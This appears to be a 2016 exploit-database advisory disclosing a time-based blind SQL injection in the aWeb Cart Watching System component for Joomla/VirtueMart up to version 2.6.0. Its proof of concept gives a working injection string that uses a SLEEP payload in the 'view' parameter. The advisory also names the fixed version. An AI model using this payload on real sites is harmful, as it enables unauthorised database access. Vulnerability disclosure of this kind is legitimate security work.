Home / os / winmobile

Joomla aWeb Cart Watching System For Virtuemart 2.6.0 SQL Injection

Posted on 29 December 2016

# Exploit Title: Sqli Blind Timebased on Joomla + Viertuemart + aweb-cartwatching-system/aweb-cartwatching <= 2.6.0 # Date: 28-12-2016 # Software Link: http://awebsupport.com/products/aweb-cartwatching-system # Exploit Author: Javi Espejo(qemm) # Contact: http://twitter.com/javiespejo # Website: http://raipson.com # CVE: REQUESTED # Category: webapps 1. Description Any remote user can access to the victim server trough a SQLI Blind Injection on a component of aweb_cartwatching_system and aweb_cart_autosave This the code that has the parameters with the parameters not sanitized 2. Proof of Concept option=com_virtuemart&view=categorysearch' RLIKE (SELECT * FROM (SELECT(SLEEP(5)))sgjA) AND 'jHwz'='jHwz&task=smartSearch and it works and I can access to every database on the client system launching other queries. 3. Solution: Update to version 2.6.1 from the update center of joomla. The Joomla vel publish the vulnerability on Answer from Joomla VEL "We have added it to the VEL here: https://vel.joomla.org/resolved/1897-aweb-cart-watching-system-2-6-0 http://awebsupport.com/

 

TOP